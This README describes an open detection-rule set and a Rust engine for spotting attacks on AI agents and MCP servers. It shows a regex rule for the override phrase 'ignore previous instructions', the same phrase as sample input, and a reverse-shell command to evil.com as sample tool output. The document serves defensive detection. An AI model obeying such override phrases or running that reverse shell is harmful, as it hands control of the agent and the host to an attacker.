Open detection rules for AI agent security threats. Like Sigma for SIEMs, but for AI agents and MCP servers.
71 YAML rules across 9 threat categories, with a reference Rust rule engine.
| Category | Rules | Detects |
|---|---|---|
| Prompt Injection | 22 | Jailbreaks, persona hijacking, multilingual attacks, encoding evasion |
| Tool Poisoning | 11 | Malicious MCP responses, reverse shells in tool output, consent bypass |
| Agent Manipulation | 10 | Cross-agent attacks, sybil consensus, goal hijacking, identity spoofing |
| Context Exfiltration | 7 | System prompt theft, API key exposure, env var harvesting |
| Skill Compromise | 7 | Typosquatting, description-behavior mismatch, supply chain |
| Privilege Escalation | 6 | Scope creep, eval injection, shell escape, delayed execution |
| Excessive Autonomy | 5 | Runaway loops, resource exhaustion, unauthorized actions |
| Model Security | 2 | Behavior extraction, malicious fine-tuning data |
| Data Poisoning | 1 | RAG/knowledge base tampering |
title: "Direct Prompt Injection"
id: ATR-2026-001
severity: high
detection_tier: pattern
references:
owasp_llm: ["LLM01:2025 - Prompt Injection"]
mitre_atlas: ["AML.T0051 - LLM Prompt Injection"]
tags:
category: prompt-injection
detection:
conditions:
- field: user_input
operator: regex
value: "(?i)\\b(ignore|disregard)\\s+previous\\s+instructions?"
description: "Instruction override attempt"use atr::RuleEngine;
use std::path::Path;
let engine = RuleEngine::load(Path::new("rules")).unwrap();
println!("Loaded {} rules", engine.rule_count());
// Check user input for prompt injection
let matches = engine.check_user_input("ignore all previous instructions");
for m in &matches {
println!("[{}] {} — {}", m.rule_id, m.severity, m.matched_condition);
}
// Check tool response for poisoning
let matches = engine.check_tool_response("bash -i >& /dev/tcp/evil.com/4444");[dependencies]
atr = { git = "https://github.com/InnerWarden/atr" }Rules match against specific inspection points:
| Field | Where it applies |
|---|---|
user_input |
Tool descriptions, user-supplied text, prompt content |
tool_args |
Tool call arguments / parameters |
tool_response |
Tool output, agent responses |
content |
Matches at ALL inspection points |
- Add a YAML rule in
rules/<category>/ - Follow the schema above
- Include
test_caseswith true positives and true negatives - Submit a PR
Part of the InnerWarden security ecosystem.